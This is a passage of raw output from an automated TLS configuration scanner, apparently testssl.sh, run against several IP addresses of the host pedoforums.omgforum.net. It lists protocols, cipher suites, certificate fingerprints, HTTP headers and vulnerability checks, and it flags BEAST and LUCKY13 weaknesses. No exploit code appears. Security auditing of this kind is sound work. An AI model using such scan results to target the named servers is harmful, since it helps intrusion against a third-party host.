2488 Java 8u31 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
2489 OpenSSL 1.0.1l TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2490 OpenSSL 1.0.2e TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2491
2492[7m Done 2017-11-30 00:43:08 [ 807s] -->> 178.33.44.177:443 (pedoforums.omgforum.net) <<--[m
2493
2494-----------------------------------------------------
2495[7m Start 2017-11-30 00:43:11 -->> 178.33.43.178:443 (pedoforums.omgforum.net) <<--[m
2496
2497 further IP addresses: 178.33.115.32 94.23.73.212 94.23.159.185 94.23.76.111
2498 178.33.44.177 178.33.43.150 94.23.150.222
2499 188.165.2.137
2500 rDNS (178.33.43.178): --
2501 Service detected: HTTP
2502
2503
2504[1m[4m Testing protocols [m[4mvia sockets except SPDY+HTTP2 [m
2505
2506[1m SSLv2 [m[1;32mnot offered (OK)[m
2507[1m SSLv3 [m[1;32mnot offered (OK)[m
2508[1m TLS 1 [moffered
2509[1m TLS 1.1 [moffered
2510[1m TLS 1.2 [m[1;32moffered (OK)[m
2511[1m TLS 1.3 [mnot offered
2512[1m SPDY/NPN [mnot offered
2513[1m HTTP2/ALPN [mnot offered
2514
2515[1m[4m Testing ~standard cipher categories [m
2516
2517[1m NULL ciphers (no encryption) [m[1;32mnot offered (OK)[m
2518[1m Anonymous NULL Ciphers (no authentication) [m[1;32mnot offered (OK)[m
2519[1m Export ciphers (w/o ADH+NULL) [m[1;32mnot offered (OK)[m
2520[1m LOW: 64 Bit + DES encryption (w/o export) [m[1;32mnot offered (OK)[m
2521[1m Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) [m[0;32mnot offered (OK)[m
2522[1m Triple DES Ciphers (Medium) [mnot offered (OK)
2523[1m High encryption (AES+Camellia, no AEAD) [m[0;32moffered (OK)[m
2524[1m Strong encryption (AEAD ciphers) [m[1;32moffered (OK)[m
2525
2526
2527[1m[4m Testing robust (perfect) forward secrecy[m[4m, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 [m
2528
2529[0;32m PFS is offered (OK)[m ECDHE-RSA-AES256-GCM-SHA384
2530 ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
2531 DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES256-SHA256
2532 DHE-RSA-AES256-SHA ECDHE-RSA-AES128-GCM-SHA256
2533 DHE-RSA-AES128-GCM-SHA256
2534[1m Elliptic curves offered: [m[0;32mprime256v1[m
2535
2536
2537[1m[4m Testing server preferences [m
2538
2539[1m Has server cipher order? [m[1;32myes (OK)[m
2540[1m Negotiated protocol [m[1;32mTLSv1.2[m
2541[1m Negotiated cipher [m[1;32mECDHE-RSA-AES256-GCM-SHA384[m, [0;32m256 bit ECDH (P-256)[m
2542[1m Cipher order[m
2543 TLSv1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA
2544 TLSv1.1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA
2545 TLSv1.2: ECDHE-RSA-AES256-GCM-SHA384 ECDHE-RSA-AES128-GCM-SHA256
2546 DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES128-GCM-SHA256
2547 ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
2548 DHE-RSA-AES256-SHA256 DHE-RSA-AES256-SHA
2549
2550
2551[1m[4m Testing server defaults (Server Hello) [m
2552
2553[1m TLS extensions (standard) [m"server name/#0" "renegotiation info/#65281"
2554 "EC point formats/#11" "session ticket/#35"
2555 "heartbeat/#15"
2556[1m Session Ticket RFC 5077 hint [m300 seconds, session tickets keys seems to be rotated < daily
2557[1m SSL Session ID support [myes
2558[1m Session Resumption [mTickets: yes, ID: yes
2559[1m TLS clock skew[m Random values, no fingerprinting possible
2560[1m Signature Algorithm [m[0;32mSHA256 with RSA[m
2561[1m Server key size [mRSA [0;32m4096[m bits
2562[1m Fingerprint / Serial [mSHA1 377DB9566D6D36D2D760ABCF6CB77D31862B02FA / 76AEAF53AC4EA0F66625CCF5
2563 SHA256 A367E214DFB9BEF8F166CE57FBFE97D0C8F019B6FDC318A7262341E0DD6CE852
2564[1m Common Name (CN) [m[3m*.forumotion.com[m
2565[1m subjectAltName (SAN) [m[3m*.forumotion.com forumotion.com [m
2566[1m Issuer [m[3mAlphaSSL CA - SHA256 - G2[m ([3mGlobalSign nv-sa[m from [3mBE[m)
2567[1m Trust (hostname) [m[0;31mcertificate does not match supplied URI[m (same w/o SNI)
2568[1m Chain of trust[m [0;32mOk [m[0;35m[m
2569[1m EV cert[m (experimental) no
2570[1m Certificate Expiration [m[0;32m395 >= 60 days[m (2017-11-29 08:03 --> 2018-12-30 08:03 -0500)
2571[1m # of certificates provided[m 2
2572[1m Certificate Revocation List [mhttp://crl2.alphassl.com/gs/gsalphasha2g2.crl
2573[1m OCSP URI [mhttp://ocsp2.globalsign.com/gsalphasha2g2
2574[1m OCSP stapling [m[1;33m--[m
2575[1m OCSP must staple [mno
2576[1m DNS CAA RR[m (experimental) [1;33m--[m
2577[1m Certificate Transparency [m[0;32myes[m (certificate extension)
2578
2579
2580[1m[4m Testing HTTP header response @ "/" [m
2581
2582[1m HTTP Status Code [m 301 Moved Permanently, redirecting to "http://pedoforums.omgforum.net/"[0;31m -- Redirect to insecure URL (NOT ok)[m
2583[1m HTTP clock skew [m0 sec from localtime
2584[1m Strict Transport Security [m--
2585[1m Public Key Pinning [m--
2586[1m Server banner [m(no "Server" line in header, interesting!)
2587[1m Application banner [m--
2588[1m Cookie(s) [m(none issued at "/") -- maybe better try target URL of 30x
2589[1m Security headers [m[0;33m--[m
2590[1m Reverse Proxy banner [m--
2591
2592
2593[1m[4m Testing vulnerabilities [m
2594
2595[1m Heartbleed[m (CVE-2014-0160) [1;32mnot vulnerable (OK)[m
2596[1m CCS[m (CVE-2014-0224) [1;32mnot vulnerable (OK)[m
2597[1m Ticketbleed[m (CVE-2016-9244), experiment. [1;32mnot vulnerable (OK)[m
2598[1m Secure Renegotiation [m(CVE-2009-3555) [1;32mnot vulnerable (OK)[m
2599[1m Secure Client-Initiated Renegotiation [m[0;32mnot vulnerable (OK)[m
2600[1m CRIME, TLS [m(CVE-2012-4929) [0;32mnot vulnerable (OK)[m
2601[1m BREACH[m (CVE-2013-3587) [1;32mno HTTP compression (OK) [m - only supplied "/" tested
2602[1m POODLE, SSL[m (CVE-2014-3566) [1;32mnot vulnerable (OK)[m
2603[1m TLS_FALLBACK_SCSV[m (RFC 7507) [0;32mDowngrade attack prevention supported (OK)[m
2604[1m SWEET32[m (CVE-2016-2183, CVE-2016-6329) [1;32mnot vulnerable (OK)[m
2605[1m FREAK[m (CVE-2015-0204) [1;32mnot vulnerable (OK)[m
2606[1m DROWN[m (CVE-2016-0800, CVE-2016-0703) [1;32mnot vulnerable on this host and port (OK)[m
2607 make sure you don't use this certificate elsewhere with SSLv2 enabled services
2608 https://censys.io/ipv4?q=A367E214DFB9BEF8F166CE57FBFE97D0C8F019B6FDC318A7262341E0DD6CE852 could help you to find out
2609[1m LOGJAM[m (CVE-2015-4000), experimental [1;33mCommon prime with 2048 bits detected: [m[3mhaproxy 1.5 builtin[m,
2610 but no DH EXPORT ciphers
2611[1m BEAST[m (CVE-2011-3389) TLS1: [1;33mECDHE-RSA-AES256-SHA
2612 DHE-RSA-AES256-SHA [m
2613 [1;33mVULNERABLE[m -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
2614[1m LUCKY13[m (CVE-2013-0169), experimental potentially [1;33mVULNERABLE[m, uses cipher block chaining (CBC) ciphers with TLS
2615[1m RC4[m (CVE-2013-2566, CVE-2015-2808) [0;32mno RC4 ciphers detected (OK)[m
2616
2617
2618[1m[4m Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength [m
2619
2620Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
2621-----------------------------------------------------------------------------------------------------------------------------
2622 xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH[0;32m 256[m AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
2623 xc028 ECDHE-RSA-AES256-SHA384 ECDH[0;32m 256[m AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
2624 xc014 ECDHE-RSA-AES256-SHA ECDH[0;32m 256[m AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
2625 x9f DHE-RSA-AES256-GCM-SHA384 DH[0;32m 2048[m AESGCM 256 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
2626 x6b DHE-RSA-AES256-SHA256 DH[0;32m 2048[m AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
2627 x39 DHE-RSA-AES256-SHA DH[0;32m 2048[m AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA
2628 xc02f ECDHE-RSA-AES128-GCM-SHA256 ECDH[0;32m 256[m AESGCM 128 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
2629 x9e DHE-RSA-AES128-GCM-SHA256 DH[0;32m 2048[m AESGCM 128 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
2630
2631
2632[1m[4m Running client simulations via sockets [m
2633
2634 Android 2.3.7 No connection
2635 Android 4.1.1 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2636 Android 4.3 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2637 Android 4.4.2 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2638 Android 5.0.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
2639 Android 6.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
2640 Android 7.0 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2641 Chrome 51 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2642 Chrome 57 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2643 Firefox 49 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2644 Firefox 53 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2645 IE 6 XP No connection
2646 IE 7 Vista TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2647 IE 8 XP No connection
2648 IE 8 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2649 IE 11 Win 7 TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
2650 IE 11 Win 8.1 TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
2651 IE 11 Win Phone 8.1 Update TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
2652 IE 11 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2653 Edge 13 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2654 Edge 13 Win Phone 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2655 Opera 17 Win 7 TLSv1.2 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2656 Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2657 Safari 7 iOS 7.1 TLSv1.2 ECDHE-RSA-AES256-SHA384, [0;32m256 bit ECDH (P-256)[m
2658 Safari 9 OS X 10.11 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2659 Safari 10 OS X 10.12 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2660 Apple ATS 9 iOS 9 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2661 Tor 17.0.9 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2662 Java 6u45 No connection
2663 Java 7u25 No connection
2664 Java 8u31 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
2665 OpenSSL 1.0.1l TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2666 OpenSSL 1.0.2e TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2667
2668[7m Done 2017-11-30 00:46:32 [1011s] -->> 178.33.43.178:443 (pedoforums.omgforum.net) <<--[m
2669
2670-----------------------------------------------------
2671[7m Start 2017-11-30 00:46:35 -->> 178.33.43.150:443 (pedoforums.omgforum.net) <<--[m
2672
2673 further IP addresses: 178.33.115.32 94.23.73.212 94.23.159.185 94.23.76.111
2674 178.33.44.177 178.33.43.178 94.23.150.222
2675 188.165.2.137
2676 rDNS (178.33.43.150): --
2677 Service detected: HTTP
2678
2679
2680[1m[4m Testing protocols [m[4mvia sockets except SPDY+HTTP2 [m
2681
2682[1m SSLv2 [m[1;32mnot offered (OK)[m
2683[1m SSLv3 [m[1;32mnot offered (OK)[m
2684[1m TLS 1 [moffered
2685[1m TLS 1.1 [moffered
2686[1m TLS 1.2 [m[1;32moffered (OK)[m
2687[1m TLS 1.3 [mnot offered
2688[1m SPDY/NPN [mnot offered
2689[1m HTTP2/ALPN [mnot offered
2690
2691[1m[4m Testing ~standard cipher categories [m
2692
2693[1m NULL ciphers (no encryption) [m[1;32mnot offered (OK)[m
2694[1m Anonymous NULL Ciphers (no authentication) [m[1;32mnot offered (OK)[m
2695[1m Export ciphers (w/o ADH+NULL) [m[1;32mnot offered (OK)[m
2696[1m LOW: 64 Bit + DES encryption (w/o export) [m[1;32mnot offered (OK)[m
2697[1m Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) [m[0;32mnot offered (OK)[m
2698[1m Triple DES Ciphers (Medium) [mnot offered (OK)
2699[1m High encryption (AES+Camellia, no AEAD) [m[0;32moffered (OK)[m
2700[1m Strong encryption (AEAD ciphers) [m[1;32moffered (OK)[m
2701
2702
2703[1m[4m Testing robust (perfect) forward secrecy[m[4m, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 [m
2704
2705[0;32m PFS is offered (OK)[m ECDHE-RSA-AES256-GCM-SHA384
2706 ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
2707 DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES256-SHA256
2708 DHE-RSA-AES256-SHA ECDHE-RSA-AES128-GCM-SHA256
2709 DHE-RSA-AES128-GCM-SHA256
2710[1m Elliptic curves offered: [m[0;32mprime256v1[m
2711
2712
2713[1m[4m Testing server preferences [m
2714
2715[1m Has server cipher order? [m[1;32myes (OK)[m
2716[1m Negotiated protocol [m[1;32mTLSv1.2[m
2717[1m Negotiated cipher [m[1;32mECDHE-RSA-AES256-GCM-SHA384[m, [0;32m256 bit ECDH (P-256)[m
2718[1m Cipher order[m
2719 TLSv1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA
2720 TLSv1.1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA
2721 TLSv1.2: ECDHE-RSA-AES256-GCM-SHA384 ECDHE-RSA-AES128-GCM-SHA256
2722 DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES128-GCM-SHA256
2723 ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
2724 DHE-RSA-AES256-SHA256 DHE-RSA-AES256-SHA
2725
2726
2727[1m[4m Testing server defaults (Server Hello) [m
2728
2729[1m TLS extensions (standard) [m"server name/#0" "renegotiation info/#65281"
2730 "EC point formats/#11" "session ticket/#35"
2731 "heartbeat/#15"
2732[1m Session Ticket RFC 5077 hint [m300 seconds, session tickets keys seems to be rotated < daily
2733[1m SSL Session ID support [myes
2734[1m Session Resumption [mTickets: yes, ID: yes
2735[1m TLS clock skew[m Random values, no fingerprinting possible
2736[1m Signature Algorithm [m[0;32mSHA256 with RSA[m
2737[1m Server key size [mRSA [0;32m4096[m bits
2738[1m Fingerprint / Serial [mSHA1 377DB9566D6D36D2D760ABCF6CB77D31862B02FA / 76AEAF53AC4EA0F66625CCF5
2739 SHA256 A367E214DFB9BEF8F166CE57FBFE97D0C8F019B6FDC318A7262341E0DD6CE852
2740[1m Common Name (CN) [m[3m*.forumotion.com[m
2741[1m subjectAltName (SAN) [m[3m*.forumotion.com forumotion.com [m
2742[1m Issuer [m[3mAlphaSSL CA - SHA256 - G2[m ([3mGlobalSign nv-sa[m from [3mBE[m)
2743[1m Trust (hostname) [m[0;31mcertificate does not match supplied URI[m (same w/o SNI)
2744[1m Chain of trust[m [0;32mOk [m[0;35m[m
2745[1m EV cert[m (experimental) no
2746[1m Certificate Expiration [m[0;32m395 >= 60 days[m (2017-11-29 08:03 --> 2018-12-30 08:03 -0500)
2747[1m # of certificates provided[m 2
2748[1m Certificate Revocation List [mhttp://crl2.alphassl.com/gs/gsalphasha2g2.crl
2749[1m OCSP URI [mhttp://ocsp2.globalsign.com/gsalphasha2g2
2750[1m OCSP stapling [m[1;33m--[m
2751[1m OCSP must staple [mno
2752[1m DNS CAA RR[m (experimental) [1;33m--[m
2753[1m Certificate Transparency [m[0;32myes[m (certificate extension)
2754
2755
2756[1m[4m Testing HTTP header response @ "/" [m
2757
2758[1m HTTP Status Code [m 301 Moved Permanently, redirecting to "http://pedoforums.omgforum.net/"[0;31m -- Redirect to insecure URL (NOT ok)[m
2759[1m HTTP clock skew [m-1 sec from localtime
2760[1m Strict Transport Security [m--
2761[1m Public Key Pinning [m--
2762[1m Server banner [m(no "Server" line in header, interesting!)
2763[1m Application banner [m--
2764[1m Cookie(s) [m(none issued at "/") -- maybe better try target URL of 30x
2765[1m Security headers [m[0;33m--[m
2766[1m Reverse Proxy banner [m--
2767
2768
2769[1m[4m Testing vulnerabilities [m
2770
2771[1m Heartbleed[m (CVE-2014-0160) [1;32mnot vulnerable (OK)[m
2772[1m CCS[m (CVE-2014-0224) [1;32mnot vulnerable (OK)[m
2773[1m Ticketbleed[m (CVE-2016-9244), experiment. [1;32mnot vulnerable (OK)[m
2774[1m Secure Renegotiation [m(CVE-2009-3555) [1;32mnot vulnerable (OK)[m
2775[1m Secure Client-Initiated Renegotiation [m[0;32mnot vulnerable (OK)[m
2776[1m CRIME, TLS [m(CVE-2012-4929) [0;32mnot vulnerable (OK)[m
2777[1m BREACH[m (CVE-2013-3587) [1;32mno HTTP compression (OK) [m - only supplied "/" tested
2778[1m POODLE, SSL[m (CVE-2014-3566) [1;32mnot vulnerable (OK)[m
2779[1m TLS_FALLBACK_SCSV[m (RFC 7507) [0;32mDowngrade attack prevention supported (OK)[m
2780[1m SWEET32[m (CVE-2016-2183, CVE-2016-6329) [1;32mnot vulnerable (OK)[m
2781[1m FREAK[m (CVE-2015-0204) [1;32mnot vulnerable (OK)[m
2782[1m DROWN[m (CVE-2016-0800, CVE-2016-0703) [1;32mnot vulnerable on this host and port (OK)[m
2783 make sure you don't use this certificate elsewhere with SSLv2 enabled services
2784 https://censys.io/ipv4?q=A367E214DFB9BEF8F166CE57FBFE97D0C8F019B6FDC318A7262341E0DD6CE852 could help you to find out
2785[1m LOGJAM[m (CVE-2015-4000), experimental [1;33mCommon prime with 2048 bits detected: [m[3mhaproxy 1.5 builtin[m,
2786 but no DH EXPORT ciphers
2787[1m BEAST[m (CVE-2011-3389) TLS1: [1;33mECDHE-RSA-AES256-SHA
2788 DHE-RSA-AES256-SHA [m
2789 [1;33mVULNERABLE[m -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
2790[1m LUCKY13[m (CVE-2013-0169), experimental potentially [1;33mVULNERABLE[m, uses cipher block chaining (CBC) ciphers with TLS
2791[1m RC4[m (CVE-2013-2566, CVE-2015-2808) [0;32mno RC4 ciphers detected (OK)[m
2792
2793
2794[1m[4m Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength [m
2795
2796Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
2797-----------------------------------------------------------------------------------------------------------------------------
2798 xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH[0;32m 256[m AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
2799 xc028 ECDHE-RSA-AES256-SHA384 ECDH[0;32m 256[m AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
2800 xc014 ECDHE-RSA-AES256-SHA ECDH[0;32m 256[m AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
2801 x9f DHE-RSA-AES256-GCM-SHA384 DH[0;32m 2048[m AESGCM 256 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
2802 x6b DHE-RSA-AES256-SHA256 DH[0;32m 2048[m AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
2803 x39 DHE-RSA-AES256-SHA DH[0;32m 2048[m AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA
2804 xc02f ECDHE-RSA-AES128-GCM-SHA256 ECDH[0;32m 256[m AESGCM 128 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
2805 x9e DHE-RSA-AES128-GCM-SHA256 DH[0;32m 2048[m AESGCM 128 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
2806
2807
2808[1m[4m Running client simulations via sockets [m
2809
2810 Android 2.3.7 No connection
2811 Android 4.1.1 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2812 Android 4.3 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2813 Android 4.4.2 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2814 Android 5.0.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
2815 Android 6.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
2816 Android 7.0 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2817 Chrome 51 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2818 Chrome 57 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2819 Firefox 49 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2820 Firefox 53 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2821 IE 6 XP No connection
2822 IE 7 Vista TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2823 IE 8 XP No connection
2824 IE 8 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2825 IE 11 Win 7 TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
2826 IE 11 Win 8.1 TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
2827 IE 11 Win Phone 8.1 Update TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
2828 IE 11 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2829 Edge 13 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2830 Edge 13 Win Phone 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2831 Opera 17 Win 7 TLSv1.2 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2832 Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2833 Safari 7 iOS 7.1 TLSv1.2 ECDHE-RSA-AES256-SHA384, [0;32m256 bit ECDH (P-256)[m
2834 Safari 9 OS X 10.11 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2835 Safari 10 OS X 10.12 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2836 Apple ATS 9 iOS 9 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2837 Tor 17.0.9 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2838 Java 6u45 No connection
2839 Java 7u25 No connection
2840 Java 8u31 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
2841 OpenSSL 1.0.1l TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2842 OpenSSL 1.0.2e TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2843
2844[7m Done 2017-11-30 00:49:59 [1218s] -->> 178.33.43.150:443 (pedoforums.omgforum.net) <<--[m
2845
2846-----------------------------------------------------
2847[7m Start 2017-11-30 00:50:02 -->> 94.23.150.222:443 (pedoforums.omgforum.net) <<--[m
2848
2849 further IP addresses: 178.33.115.32 94.23.73.212 94.23.159.185 94.23.76.111
2850 178.33.44.177 178.33.43.178 178.33.43.150
2851 188.165.2.137
2852 rDNS (94.23.150.222): --
2853 Service detected: HTTP
2854
2855
2856[1m[4m Testing protocols [m[4mvia sockets except SPDY+HTTP2 [m
2857
2858[1m SSLv2 [m[1;32mnot offered (OK)[m
2859[1m SSLv3 [m[1;32mnot offered (OK)[m
2860[1m TLS 1 [moffered
2861[1m TLS 1.1 [moffered
2862[1m TLS 1.2 [m[1;32moffered (OK)[m
2863[1m TLS 1.3 [mnot offered
2864[1m SPDY/NPN [mnot offered
2865[1m HTTP2/ALPN [mnot offered
2866
2867[1m[4m Testing ~standard cipher categories [m
2868
2869[1m NULL ciphers (no encryption) [m[1;32mnot offered (OK)[m
2870[1m Anonymous NULL Ciphers (no authentication) [m[1;32mnot offered (OK)[m
2871[1m Export ciphers (w/o ADH+NULL) [m[1;32mnot offered (OK)[m
2872[1m LOW: 64 Bit + DES encryption (w/o export) [m[1;32mnot offered (OK)[m
2873[1m Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) [m[0;32mnot offered (OK)[m
2874[1m Triple DES Ciphers (Medium) [mnot offered (OK)
2875[1m High encryption (AES+Camellia, no AEAD) [m[0;32moffered (OK)[m
2876[1m Strong encryption (AEAD ciphers) [m[1;32moffered (OK)[m
2877
2878
2879[1m[4m Testing robust (perfect) forward secrecy[m[4m, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 [m
2880
2881[0;32m PFS is offered (OK)[m ECDHE-RSA-AES256-GCM-SHA384
2882 ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
2883 DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES256-SHA256
2884 DHE-RSA-AES256-SHA ECDHE-RSA-AES128-GCM-SHA256
2885 DHE-RSA-AES128-GCM-SHA256
2886[1m Elliptic curves offered: [m[0;32mprime256v1[m
2887
2888
2889[1m[4m Testing server preferences [m
2890
2891[1m Has server cipher order? [m[1;32myes (OK)[m
2892[1m Negotiated protocol [m[1;32mTLSv1.2[m
2893[1m Negotiated cipher [m[1;32mECDHE-RSA-AES256-GCM-SHA384[m, [0;32m256 bit ECDH (P-256)[m
2894[1m Cipher order[m
2895 TLSv1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA
2896 TLSv1.1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA
2897 TLSv1.2: ECDHE-RSA-AES256-GCM-SHA384 ECDHE-RSA-AES128-GCM-SHA256
2898 DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES128-GCM-SHA256
2899 ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
2900 DHE-RSA-AES256-SHA256 DHE-RSA-AES256-SHA
2901
2902
2903[1m[4m Testing server defaults (Server Hello) [m
2904
2905[1m TLS extensions (standard) [m"server name/#0" "renegotiation info/#65281"
2906 "EC point formats/#11" "session ticket/#35"
2907 "heartbeat/#15"
2908[1m Session Ticket RFC 5077 hint [m300 seconds, session tickets keys seems to be rotated < daily
2909[1m SSL Session ID support [myes
2910[1m Session Resumption [mTickets: yes, ID: yes
2911[1m TLS clock skew[m Random values, no fingerprinting possible
2912[1m Signature Algorithm [m[0;32mSHA256 with RSA[m
2913[1m Server key size [mRSA [0;32m4096[m bits
2914[1m Fingerprint / Serial [mSHA1 377DB9566D6D36D2D760ABCF6CB77D31862B02FA / 76AEAF53AC4EA0F66625CCF5
2915 SHA256 A367E214DFB9BEF8F166CE57FBFE97D0C8F019B6FDC318A7262341E0DD6CE852
2916[1m Common Name (CN) [m[3m*.forumotion.com[m
